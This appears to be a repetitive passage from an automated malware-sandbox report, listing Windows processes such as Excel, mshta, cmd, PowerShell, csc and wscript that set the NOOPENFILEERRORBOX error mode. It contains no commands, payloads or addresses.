        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
